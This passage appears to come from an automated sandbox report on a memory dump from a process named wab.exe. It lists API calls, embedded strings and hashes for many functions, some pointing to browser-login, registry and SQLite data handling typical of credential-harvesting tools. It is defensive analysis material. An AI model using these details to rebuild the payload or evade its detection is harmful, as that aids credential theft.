                                                                                  • API ID: _wcsicmp$wcslen$_memicmp
                                                                                  • String ID: .save$http://$https://$log profile$signIn
                                                                                  • API String ID: 1214746602-2708368587
                                                                                  • Opcode ID: 3e4eac411a0fb8cde327a0735871c2cff258de2e34b2a7eb3fc074b31144511c
                                                                                  • Instruction ID: a06b7041105a35739b636013fb05be6f811b580b4b6be30494b1fb5d54fb6444
                                                                                  • Opcode Fuzzy Hash: 3e4eac411a0fb8cde327a0735871c2cff258de2e34b2a7eb3fc074b31144511c
                                                                                  • Instruction Fuzzy Hash: CF41E6F25047018AF730AA65988176773C8DBD4329F20893FE466E27C3DB7CE841451D
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000001A.00000002.1935213977.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_26_2_400000_wab.jbxd
                                                                                  Similarity
                                                                                  • API ID: ??2@$??3@$FocusInvalidateRectmemset
                                                                                  • String ID:
                                                                                  • API String ID: 2313361498-0
                                                                                  • Opcode ID: ae1e8c4172d72900b4b853b02d180aef4faae84485dd6f90a73647b320165284
                                                                                  • Instruction ID: b0df241c53c05d00948b57b0581abff4a91b8671001b7eb205ccc6b71985861b
                                                                                  • Opcode Fuzzy Hash: ae1e8c4172d72900b4b853b02d180aef4faae84485dd6f90a73647b320165284
                                                                                  • Instruction Fuzzy Hash: F231C1B1500601AFEB249F6AD88692AB7A8FF14344B11853FF545E72A0DB38ED90CFD4
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  • GetClientRect.USER32(?,?), ref: 00405F65
                                                                                  • GetWindow.USER32(?,00000005), ref: 00405F7D
                                                                                  • GetWindow.USER32(00000000), ref: 00405F80
                                                                                    • Part of subcall function 00401739: GetWindowRect.USER32(?,?), ref: 00401748
                                                                                  • GetWindow.USER32(00000000,00000002), ref: 00405F8C
                                                                                  • GetDlgItem.USER32(?,0000040C), ref: 00405FA2
                                                                                  • SendMessageW.USER32(00000000,00000160,0000015E,00000000), ref: 00405FE1
                                                                                  • GetDlgItem.USER32(?,0000040E), ref: 00405FEB
                                                                                  • SendMessageW.USER32(00000000,00000160,0000015E,00000000), ref: 0040603A
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000001A.00000002.1935213977.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_26_2_400000_wab.jbxd
                                                                                  Similarity
                                                                                  • API ID: Window$ItemMessageRectSend$Client
                                                                                  • String ID:
                                                                                  • API String ID: 2047574939-0
                                                                                  • Opcode ID: 0a5759caa3c3a2066378adc41c959573f6e4568a1edde2a40f49f69ca2684f31
                                                                                  • Instruction ID: 7069056512839d5548a4ade768bb81bcd5f8c043aef79b83aaef118172e1f21b
                                                                                  • Opcode Fuzzy Hash: 0a5759caa3c3a2066378adc41c959573f6e4568a1edde2a40f49f69ca2684f31
                                                                                  • Instruction Fuzzy Hash: 3421A4B1B4070977E60137629C47F7B666CEF95718F04003AFB007F1C2DABA5C0649A9
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                    • Part of subcall function 0044A6E0: memset.MSVCRT ref: 0044A6EB
                                                                                    • Part of subcall function 0044A6E0: memset.MSVCRT ref: 0044A6FB
                                                                                    • Part of subcall function 0044A6E0: memcpy.MSVCRT ref: 0044A75D
                                                                                    • Part of subcall function 0044A6E0: memcpy.MSVCRT ref: 0044A7AA
                                                                                  • memcpy.MSVCRT ref: 0044A8BF
                                                                                  • memcpy.MSVCRT ref: 0044A90C
                                                                                  • memcpy.MSVCRT ref: 0044A988
                                                                                    • Part of subcall function 0044A3F0: memcpy.MSVCRT ref: 0044A422
                                                                                    • Part of subcall function 0044A3F0: memcpy.MSVCRT ref: 0044A46E
                                                                                  • memcpy.MSVCRT ref: 0044A9D8
                                                                                  • memcpy.MSVCRT ref: 0044AA19
                                                                                  • memcpy.MSVCRT ref: 0044AA4A
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000001A.00000002.1935213977.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_26_2_400000_wab.jbxd
                                                                                  Similarity
                                                                                  • API ID: memcpy$memset
                                                                                  • String ID: gj
                                                                                  • API String ID: 438689982-4203073231
                                                                                  • Opcode ID: 85f25b7c526aeaf15c340c15a86b7b9b8fd097bc53de23dcb8424ba1f871f8ae
                                                                                  • Instruction ID: 6893d0ddfb5a5ce8f484e87047b84ef7868cce638272d7e844f470f6f9013d76
                                                                                  • Opcode Fuzzy Hash: 85f25b7c526aeaf15c340c15a86b7b9b8fd097bc53de23dcb8424ba1f871f8ae
                                                                                  • Instruction Fuzzy Hash: 2E71D6F39083449BE310EF25D84059FB7E9ABD5348F050E2EF88997205E639DA19C797
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000001A.00000002.1935213977.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_26_2_400000_wab.jbxd
                                                                                  Similarity
                                                                                  • API ID: memcpy
                                                                                  • String ID: $, $CREATE TABLE $h\E$h\E$t\El\E
                                                                                  • API String ID: 3510742995-2446657581
                                                                                  • Opcode ID: 14c264379a519ee19885d409f26ecc6e2d490775587d859f835060da74a6389d
                                                                                  • Instruction ID: 6ffa86bec377aa4089670d2183b3ec09711c7f982517375fcd2495ffcd0e8f65
                                                                                  • Opcode Fuzzy Hash: 14c264379a519ee19885d409f26ecc6e2d490775587d859f835060da74a6389d
                                                                                  • Instruction Fuzzy Hash: CE51CF71D00219DFCB10CF99C490AAEB7F5EF89319F21925BD841AB206D738AE45CF98
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  • GetDlgItem.USER32(?,000003E9), ref: 00405A25
                                                                                  • SendMessageW.USER32(00000000,00001009,00000000,00000000), ref: 00405A3E
                                                                                  • SendMessageW.USER32(?,00001036,00000000,00000026), ref: 00405A4B
                                                                                  • SendMessageW.USER32(?,0000101C,00000000,00000000), ref: 00405A57
                                                                                  • memset.MSVCRT ref: 00405ABB
                                                                                  • SendMessageW.USER32(?,0000105F,?,?), ref: 00405AF0
                                                                                  • SetFocus.USER32(?), ref: 00405B76
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000001A.00000002.1935213977.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_26_2_400000_wab.jbxd
                                                                                  Similarity
                                                                                  • API ID: MessageSend$FocusItemmemset
                                                                                  • String ID:
                                                                                  • API String ID: 4281309102-0
                                                                                  • Opcode ID: efd53bebf051b2277f9dab0bebba2bcddea9ab5f54e930dc2bb54400b8a4bf25
                                                                                  • Instruction ID: 6f3680249e95162a2c17081b35fa045d6cf646e1ea5253f38cdaf521fbeb1c86
                                                                                  • Opcode Fuzzy Hash: efd53bebf051b2277f9dab0bebba2bcddea9ab5f54e930dc2bb54400b8a4bf25
                                                                                  • Instruction Fuzzy Hash: 86414B75900219BBDB20DF95CC85EAFBFB8FF04754F10406AF508A6291D3759A90CFA4
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000001A.00000002.1935213977.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_26_2_400000_wab.jbxd
                                                                                  Similarity
                                                                                  • API ID: _snwprintfwcscat
                                                                                  • String ID: &nbsp;$<td bgcolor=#%s nowrap>%s$<td bgcolor=#%s>%s$<tr>
                                                                                  • API String ID: 384018552-4153097237
                                                                                  • Opcode ID: e2d8d0cbab619b5be06ee0f81a04f929cebd05eebf119826ccd3725ad5dc4e14
                                                                                  • Instruction ID: 690b9c6e7bf42a1b777b65718bd5b5c6a61f2cd8039d9a9c88f4ff4500a270e2
                                                                                  • Opcode Fuzzy Hash: e2d8d0cbab619b5be06ee0f81a04f929cebd05eebf119826ccd3725ad5dc4e14
                                                                                  • Instruction Fuzzy Hash: D8319E31A00209AFDF14AF55CC86AAE7BB5FF45320F10007AE804AB292D775AE49DB94
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000001A.00000002.1935213977.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_26_2_400000_wab.jbxd
                                                                                  Similarity
                                                                                  • API ID: ItemMenu$CountInfomemsetwcschr
                                                                                  • String ID: 0$6
                                                                                  • API String ID: 2029023288-3849865405
                                                                                  • Opcode ID: 391c38dbba120c466a74104014748036d1901581f04e0d37adf97963ab497765
                                                                                  • Instruction ID: 35075b9e4b0179943f9cc9fcb0392e174ec026107191ec1d659f896637aaeb19
                                                                                  • Opcode Fuzzy Hash: 391c38dbba120c466a74104014748036d1901581f04e0d37adf97963ab497765
                                                                                  • Instruction Fuzzy Hash: A321AB32905300ABD720AF91DC8599FB7B8FB85754F000A3FF954A2280E779D944CB9A
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                    • Part of subcall function 004055A4: GetLastError.KERNEL32(?,00000000,00405522,?,?,?,00000000,00000000,?,00408E1C,?,?,00000060,00000000), ref: 004055B9
                                                                                  • memset.MSVCRT ref: 00405455
                                                                                  • memset.MSVCRT ref: 0040546C
                                                                                  • memset.MSVCRT ref: 00405483
                                                                                  • memcpy.MSVCRT ref: 00405498
                                                                                  • memcpy.MSVCRT ref: 004054AD
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000001A.00000002.1935213977.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_26_2_400000_wab.jbxd
                                                                                  Similarity
                                                                                  • API ID: memset$memcpy$ErrorLast
                                                                                  • String ID: 6$\
                                                                                  • API String ID: 404372293-1284684873
                                                                                  • Opcode ID: c52bb6eee22109a6197316720abdd8282c22b56b49716a990b3966b2803c4fd3
                                                                                  • Instruction ID: af38dfd20ac5a94c77b7ead9800c7a3089711b207e9f3183cf3669ed78e53beb
                                                                                  • Opcode Fuzzy Hash: c52bb6eee22109a6197316720abdd8282c22b56b49716a990b3966b2803c4fd3
                                                                                  • Instruction Fuzzy Hash: 572141B280112CBBDF11AF99DC45EDF7BACDF15304F0080A6B509E2156E6398B988F65
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  • FileTimeToSystemTime.KERNEL32(?,?), ref: 0040A088
                                                                                  • GetDateFormatW.KERNEL32(00000400,00000001,000007C1,00000000,?,00000080), ref: 0040A0B4
                                                                                  • GetTimeFormatW.KERNEL32(00000400,00000000,000007C1,00000000,?,00000080), ref: 0040A0C9
                                                                                  • wcscpy.MSVCRT ref: 0040A0D9
                                                                                  • wcscat.MSVCRT ref: 0040A0E6
                                                                                  • wcscat.MSVCRT ref: 0040A0F5
                                                                                  • wcscpy.MSVCRT ref: 0040A107
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000001A.00000002.1935213977.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_26_2_400000_wab.jbxd
                                                                                  Similarity
                                                                                  • API ID: Time$Formatwcscatwcscpy$DateFileSystem
                                                                                  • String ID:
                                                                                  • API String ID: 1331804452-0
                                                                                  • Opcode ID: f8aa036cb335485c7d93aed18039143b3373b2c7e44f2a4205c7e838cddf6ff7
                                                                                  • Instruction ID: 70f18838178cd2dbc623065d80ced1a8b0c5b1489d8a310e1ceaee9f81d034e1
                                                                                  • Opcode Fuzzy Hash: f8aa036cb335485c7d93aed18039143b3373b2c7e44f2a4205c7e838cddf6ff7
                                                                                  • Instruction Fuzzy Hash: 321191B284011DBFEB10AF95DC45DEF777CEB01745F104076B904B6091E6399E858B7A
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                    • Part of subcall function 0040440C: FreeLibrary.KERNEL32(?,0040436D,00000000,00000000,?,0040BDCC,?,00000000,?), ref: 00404414
                                                                                    • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                                    • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                                                                    • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                                    • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                                    • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                                                                    • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                                                                  • GetProcAddress.KERNEL32(?,00000000), ref: 00404398
                                                                                  • GetProcAddress.KERNEL32(?,00000000), ref: 004043AC
                                                                                  • GetProcAddress.KERNEL32(?,00000000), ref: 004043BF
                                                                                  • GetProcAddress.KERNEL32(?,00000000), ref: 004043D3
                                                                                  • GetProcAddress.KERNEL32(?,00000000), ref: 004043E7
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000001A.00000002.1935213977.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_26_2_400000_wab.jbxd
                                                                                  Similarity
                                                                                  • API ID: AddressProc$Library$Load$DirectoryFreeSystemmemsetwcscatwcscpy
                                                                                  • String ID: advapi32.dll
                                                                                  • API String ID: 2012295524-4050573280
                                                                                  • Opcode ID: 65f3d33700ac9d510cc5e5eb6f652d35bee5e6265e8d5a0c26d000a27f9b730c
                                                                                  • Instruction ID: 6b6c0a27b71384d3bff991c3c7ca7c9b0301c8735f49a3ee57333cb8f9a5f734
                                                                                  • Opcode Fuzzy Hash: 65f3d33700ac9d510cc5e5eb6f652d35bee5e6265e8d5a0c26d000a27f9b730c
                                                                                  • Instruction Fuzzy Hash: 5F119470440700DDE6307F62EC0AF2777A4DF80714F104A3FE541565E1DBB8A8519AAD
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  Strings
                                                                                  • <?xml version="1.0" ?>, xrefs: 0041007C
                                                                                  • <%s>, xrefs: 004100A6
                                                                                  • <?xml version="1.0" encoding="ISO-8859-1" ?>, xrefs: 00410083
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000001A.00000002.1935213977.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_26_2_400000_wab.jbxd
                                                                                  Similarity
                                                                                  • API ID: memset$_snwprintf
                                                                                  • String ID: <%s>$<?xml version="1.0" ?>$<?xml version="1.0" encoding="ISO-8859-1" ?>
                                                                                  • API String ID: 3473751417-2880344631
                                                                                  • Opcode ID: 8f05c840c11c4290d444f2162549af975e664009f5abef6099482a1c5cfc950c
                                                                                  • Instruction ID: 2862698e7f89dc449948c814091faf4507903f68b21858a7dbdf66e33a92e1a6
                                                                                  • Opcode Fuzzy Hash: 8f05c840c11c4290d444f2162549af975e664009f5abef6099482a1c5cfc950c
                                                                                  • Instruction Fuzzy Hash: F501C8F2E402197BD720AA559C41FEAB6ACEF48345F0040B7B608B3151D6389F494B99
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000001A.00000002.1935213977.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_26_2_400000_wab.jbxd
                                                                                  Similarity
                                                                                  • API ID: wcscat$_snwprintfmemset
                                                                                  • String ID: %2.2X
                                                                                  • API String ID: 2521778956-791839006
                                                                                  • Opcode ID: fbe0b2ef567fee9eabd5ce406f53818797bf0b783fcface126c98386edfee971
                                                                                  • Instruction ID: 672bbb69153a15f1984629f72f86def8939f314c78adde6f8276b735d3b02408
                                                                                  • Opcode Fuzzy Hash: fbe0b2ef567fee9eabd5ce406f53818797bf0b783fcface126c98386edfee971
                                                                                  • Instruction Fuzzy Hash: 2101D472A403297AF7206756AC46BBA33ACAB41714F11407BFC14AA1C2EA7C9A54469A
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000001A.00000002.1935213977.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_26_2_400000_wab.jbxd
                                                                                  Similarity
                                                                                  • API ID: _snwprintfwcscpy
                                                                                  • String ID: dialog_%d$general$menu_%d$strings
                                                                                  • API String ID: 999028693-502967061
                                                                                  • Opcode ID: 17378f80787d8f3ebe1be11f22ab444215ff95c87d82bd16ffe54226d060cac5
                                                                                  • Instruction ID: 4b5f4d23dee208ad245a1fa3262b8d520e9fbefe09054bf07968a47f6ed58b46
                                                                                  • Opcode Fuzzy Hash: 17378f80787d8f3ebe1be11f22ab444215ff95c87d82bd16ffe54226d060cac5
                                                                                  • Instruction Fuzzy Hash: 1AE04FB5E8870035E92519A10C03B2A155086A6B5BF740C2BFD0AB11D2E47F955DA40F
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000001A.00000002.1935213977.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_26_2_400000_wab.jbxd
                                                                                  Similarity
                                                                                  • API ID: memcpy$memsetstrlen
                                                                                  • String ID:
                                                                                  • API String ID: 2350177629-0
                                                                                  • Opcode ID: b0fd6244f294145fe9a6ea4e3d429f9bbf97f6839acfbc1745acf2347c5e71ea
                                                                                  • Instruction ID: 5f65aa9fdfa02acdbc3988aed820739efb0bf546d233f5e01752542f466a415e
                                                                                  • Opcode Fuzzy Hash: b0fd6244f294145fe9a6ea4e3d429f9bbf97f6839acfbc1745acf2347c5e71ea
                                                                                  • Instruction Fuzzy Hash: 3951017290050DBEEB51DAE8CC45FEFBBBCAB09304F004476F709E6155E6349B498BA6
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000001A.00000002.1935213977.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_26_2_400000_wab.jbxd
                                                                                  Similarity
                                                                                  • API ID: memset
                                                                                  • String ID: 8$GROUP$ORDER$a GROUP BY clause is required before HAVING$aggregate functions are not allowed in the GROUP BY clause
                                                                                  • API String ID: 2221118986-1606337402
                                                                                  • Opcode ID: 10415b1a1c8003ecd0031fb780f2e77066144490245ccd4b04bba77302a40a65
                                                                                  • Instruction ID: 7aef5b05df8cb417835a49add62511a3dd126d480fa81acd131143259a3eb597
                                                                                  • Opcode Fuzzy Hash: 10415b1a1c8003ecd0031fb780f2e77066144490245ccd4b04bba77302a40a65
                                                                                  • Instruction Fuzzy Hash: 5D818A706083219FDB10CF25E48162BB7E1EF84318F96885EEC949B256D738EC55CB9B
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000001A.00000002.1935213977.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_26_2_400000_wab.jbxd
                                                                                  Similarity
                                                                                  • API ID: memcmpmemset$_mbscpymemcpystrlen
                                                                                  • String ID:
                                                                                  • API String ID: 265355444-0
                                                                                  • Opcode ID: a83a1467d2796da51f33b336eeec327ded5aa3ca15fd709dc7ec48effe5a66b1
                                                                                  • Instruction ID: d0ac777748d33e6673793c59e161d6f76d61048b6b1b65ce46f59eb5e56095ce
                                                                                  • Opcode Fuzzy Hash: a83a1467d2796da51f33b336eeec327ded5aa3ca15fd709dc7ec48effe5a66b1
                                                                                  • Instruction Fuzzy Hash: E241677190060CBEEB21DAA0DC45FDFB7BCAF04344F00443EF655E6182E675AA498BA5
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                    • Part of subcall function 0040B1AB: ??3@YAXPAX@Z.MSVCRT ref: 0040B1AE
                                                                                    • Part of subcall function 0040B1AB: ??3@YAXPAX@Z.MSVCRT ref: 0040B1B6
                                                                                    • Part of subcall function 00414592: RegOpenKeyExW.KERNELBASE(80000002,80000002,00000000,00020019,80000002,00414CC1,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00445DDE,?,?,00000000), ref: 004145A5
                                                                                    • Part of subcall function 0040A9CE: ??3@YAXPAX@Z.MSVCRT ref: 0040A9DD
                                                                                  • memset.MSVCRT ref: 0040C439
                                                                                  • RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,?,?,00000000,?), ref: 0040C467
                                                                                  • _wcsupr.MSVCRT ref: 0040C481
                                                                                    • Part of subcall function 0040A8D0: wcslen.MSVCRT ref: 0040A8E2
                                                                                    • Part of subcall function 0040A8D0: ??3@YAXPAX@Z.MSVCRT ref: 0040A908
                                                                                    • Part of subcall function 0040A8D0: ??3@YAXPAX@Z.MSVCRT ref: 0040A92B
                                                                                    • Part of subcall function 0040A8D0: memcpy.MSVCRT ref: 0040A94F
                                                                                  • memset.MSVCRT ref: 0040C4D0
                                                                                  • RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,000000FF,?,?,?,?,00000000), ref: 0040C4FB
                                                                                  • RegCloseKey.ADVAPI32(?,?,?,?,?,00000000,?), ref: 0040C508
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000001A.00000002.1935213977.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_26_2_400000_wab.jbxd
                                                                                  Similarity
                                                                                  • API ID: ??3@$EnumValuememset$CloseOpen_wcsuprmemcpywcslen
                                                                                  • String ID:
                                                                                  • API String ID: 1973883786-0
                                                                                  • Opcode ID: eb77d7cad75ccead34f911285e165139a1ce78e2e313fb24f2a05cc2c8735199
                                                                                  • Instruction ID: d2440758a7fd93b52fc88bd6111275bc9aa4df1ffeb01c53d5483546710cd2f3
                                                                                  • Opcode Fuzzy Hash: eb77d7cad75ccead34f911285e165139a1ce78e2e313fb24f2a05cc2c8735199
                                                                                  • Instruction Fuzzy Hash: A4411CB2900219BBDB00EF95DC85EEFB7BCAF48304F10417AB505F6191D7749A44CBA5
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  • memset.MSVCRT ref: 004116FF
                                                                                    • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,00402E6F), ref: 0040D173
                                                                                    • Part of subcall function 0040D134: LoadStringW.USER32(00000000,?,?), ref: 0040D20C
                                                                                    • Part of subcall function 0040D134: memcpy.MSVCRT ref: 0040D24C
                                                                                    • Part of subcall function 0040D134: wcscpy.MSVCRT ref: 0040D1B5
                                                                                    • Part of subcall function 0040D134: wcslen.MSVCRT ref: 0040D1D3
                                                                                    • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000), ref: 0040D1E1
                                                                                    • Part of subcall function 0040A45A: memset.MSVCRT ref: 0040A47B
                                                                                    • Part of subcall function 0040A45A: _snwprintf.MSVCRT ref: 0040A4AE
                                                                                    • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4BA
                                                                                    • Part of subcall function 0040A45A: memcpy.MSVCRT ref: 0040A4D2
                                                                                    • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4E0
                                                                                    • Part of subcall function 0040A45A: memcpy.MSVCRT ref: 0040A4F3
                                                                                    • Part of subcall function 0040A279: wcscpy.MSVCRT ref: 0040A2DF
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000001A.00000002.1935213977.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_26_2_400000_wab.jbxd
                                                                                  Similarity
                                                                                  • API ID: memcpywcslen$HandleModulememsetwcscpy$LoadString_snwprintf
                                                                                  • String ID: *.csv$*.htm;*.html$*.txt$*.xml$txt
                                                                                  • API String ID: 2618321458-3614832568
                                                                                  • Opcode ID: 892276959a0c47848777e093024f27755814d5c903fce7db561a0975b0ee82c0
                                                                                  • Instruction ID: 2af34abd3473d77be096866f654b5876edf67c2d942e61680e34910f62553c8c
                                                                                  • Opcode Fuzzy Hash: 892276959a0c47848777e093024f27755814d5c903fce7db561a0975b0ee82c0
                                                                                  • Instruction Fuzzy Hash: 71310DB1D013589BDB10EFA9DC816DDBBB4FB08345F10407BE548BB282DB385A468F99
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  • memset.MSVCRT ref: 004185FC
                                                                                  • GetFileAttributesExW.KERNEL32(00000000,00000000,?), ref: 0041860A
                                                                                  • ??3@YAXPAX@Z.MSVCRT ref: 00418650
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000001A.00000002.1935213977.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_26_2_400000_wab.jbxd
                                                                                  Similarity
                                                                                  • API ID: ??3@AttributesFilememset
                                                                                  • String ID:
                                                                                  • API String ID: 776155459-0
                                                                                  • Opcode ID: afcad17dad9998b86119828d1b617f81507b1c6ffb5a90d063004130875e5eff
                                                                                  • Instruction ID: e31a4ad29e7632976921f0390f19c15604a95804a640e9d04457ce0419b5f72c
                                                                                  • Opcode Fuzzy Hash: afcad17dad9998b86119828d1b617f81507b1c6ffb5a90d063004130875e5eff
                                                                                  • Instruction Fuzzy Hash: 1211E632A04115EFDB209FA49DC59FF73A8EB45318B21013FF911E2280DF789D8196AE
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  • AreFileApisANSI.KERNEL32 ref: 004174FC
                                                                                  • MultiByteToWideChar.KERNEL32(00000001,00000000,?,000000FF,00000000,00000000), ref: 0041751A
                                                                                  • malloc.MSVCRT ref: 00417524
                                                                                  • MultiByteToWideChar.KERNEL32(00000001,00000000,?,000000FF,00000000,00000000), ref: 0041753B
                                                                                  • ??3@YAXPAX@Z.MSVCRT ref: 00417544
                                                                                  • ??3@YAXPAX@Z.MSVCRT ref: 00417562
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000001A.00000002.1935213977.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_26_2_400000_wab.jbxd
                                                                                  Similarity
                                                                                  • API ID: ??3@ByteCharMultiWide$ApisFilemalloc
                                                                                  • String ID:
                                                                                  • API String ID: 2308052813-0
                                                                                  • Opcode ID: 5d21432bc65b929392c7d49bf17a02b877e07d349bc8417fbf8b7ee350a515ff
                                                                                  • Instruction ID: 8d188238c5fd2fb6163cec5331830b967abe0ebba74b79ef9884251e0929a2bc
                                                                                  • Opcode Fuzzy Hash: 5d21432bc65b929392c7d49bf17a02b877e07d349bc8417fbf8b7ee350a515ff
                                                                                  • Instruction Fuzzy Hash: 9701D4726081257BEB215B7A9C41DEF3AAEDF463B47210226FC14E3280EA38DD4141BD
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  • GetTempPathW.KERNEL32(000000E6,?,?,00417D63), ref: 004181DB
                                                                                  • GetTempPathA.KERNEL32(000000E6,?,?,00417D63), ref: 00418203
                                                                                  • ??3@YAXPAX@Z.MSVCRT ref: 0041822B
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000001A.00000002.1935213977.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_26_2_400000_wab.jbxd
                                                                                  Similarity
                                                                                  • API ID: PathTemp$??3@
                                                                                  • String ID: %s\etilqs_$etilqs_
